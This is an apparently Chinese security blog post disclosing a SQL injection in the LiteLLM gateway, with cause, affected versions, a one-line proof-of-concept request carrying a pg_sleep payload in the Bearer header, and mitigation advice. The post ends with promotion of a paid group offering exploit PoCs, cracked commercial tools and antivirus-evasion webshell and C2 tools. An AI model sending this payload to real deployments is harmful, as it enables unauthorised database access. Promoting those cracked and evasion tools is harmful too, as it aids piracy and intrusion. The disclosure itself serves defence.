乐于分享
好东西不私藏

AI大模型网关存在SQL注入漏洞、附 POC 复现、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)

AI大模型网关存在SQL注入漏洞、附 POC 复现、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)

0x01 简介

近期,开源大语言模型网关 LiteLLM 中发现了一个严重的 SQL 注入漏洞(CVE-2026-42208)。该漏洞存在于 LiteLLM 1.81.16 到 1.83.7 版本之间,这一版本广泛用于许多大语言模型的前端接口,如 OpenAI 和 Anthropic 等模型提供商。漏洞的发现和披露引起了网络安全界的高度关注,因为它允许未经授权的攻击者执行任意的 SQL 查询,获取敏感数据或对数据库进行恶意操作。

免责声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 更多POC末尾领取资料及加入星球福利

0x02 漏洞详情

在 LiteLLM 1.81.16 到 1.83.7 版本中,漏洞的根本原因是在执行 SQL 查询时直接使用了 HTTP 请求头中的 Authorization: Bearer 的值,而没有对该值进行参数化处理或验证。这意味着,如果攻击者能够访问 LiteLLM 代理,他们便可以通过伪造请求头,绕过认证机制,向 PostgreSQL 后端数据库注入恶意的 SQL 查询语句。

攻击者只需向任意 LLM API 路由发送特定构造的 Authorization: Bearer 值,无需有效凭证,即可触发漏洞查询路径,影响数据库执行任意 SQL 操作。 

典型受影响的 API 路径包括:

  • POST /v1/chat/completions

  • POST /v1/embeddings

  • 其他需要检验 API key 的 endpoint

0x03 漏洞复现

Request Packet

GET /v1/models HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Authorization: Bearer test' OR (SELECT 1 FROM (SELECT pg_sleep(15)) t) IS NOT NULL--Connection: keep-aliveContent-Type: application/jsonUpgrade-Insecure-Requests: 1Connection: keep-alive

0x04 修复建议

目前Vercel、Cloudflare等主流云服务平台已同步后台部署专属漏洞防护规则,未完成修复升级的业务可优先将LiteLLM网关业务迁移至已防护节点,或直接开启平台自带的AI应用安全防护、SQL注入专项防护模块,临时拦截恶意注入请求,阻断漏洞利用攻击链路,快速降低被攻击风险。

内部星球VIP介绍V1.5(更多未公开挖洞技术欢迎加入星球)

如果你想学习更多另类渗透SRC挖洞技术/攻防/免杀/应急溯源/赏金赚取/工作内推欢迎加入我们内部星球可获得内部工具字典和享受内部资源/内部群🔥

🚀1.每周更新1day/0day漏洞刷分上分,目前已更新至5394+;

🧰2.包含网上的各种付费工具/各种Burp漏洞检测插件/fuzz字典等等;

🧩3.Fofa/Hunter/Ctfshow/360Quake/Shadon/零零信安/Zoomeye各种账号高级VIP会员共享等等;

🎥4.最新SRC挖洞文库/红队/代审/免杀/逆向视频资源等等;

🧪5.内部自动化漏扫赚赏金捡洞工具,免杀CS/Webshell工具等等;

💡6.漏洞报告文库共享SRC漏洞报告学习挖洞技巧;

🎯6.最新0Day1Day漏洞POC/EXP分享地址(同步更新);

https://t.zsxq.com/8IDY4(全网最新最完整的漏洞库)

🔥7.详情直接点击下方链接进入了解,后台回复” 星球 “获取优惠先到先得!后续资源会更丰富在加入还是低价!(即将涨价)以上仅介绍部分内容还没完!点击下方地址全面了解👇🏻

👉点击了解加入–>>2026内部VIP星球福利介绍V1.5版本-1day/0day漏洞库及内部资源更新
结尾

免责声明

获取方法

回复“app” 获取  app渗透和app抓包教程

回复“渗透字典” 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍” 获取 网络安全相关经典书籍电子版pdf

压缩包解压密码:HackTwo

免责声明

文章中的案例或工具仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。本工具或文章或来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!


往期推荐

内部VIP知识星球福利介绍V1.5版本

最新BurpSuite2026.4.1专业版中英文版下载

最新Nessus2026下载Windows/Linux

最新xray1.9.11高级版下载Windows/Linux

 最新HCL AppScan Standard 10.9.128273破解版下载

渗透安全HackTwo

微信号:关注公众号获取

后台回复星球加入:知识星球

扫码关注 了解更多

喜欢的朋友可以点赞转发支持一下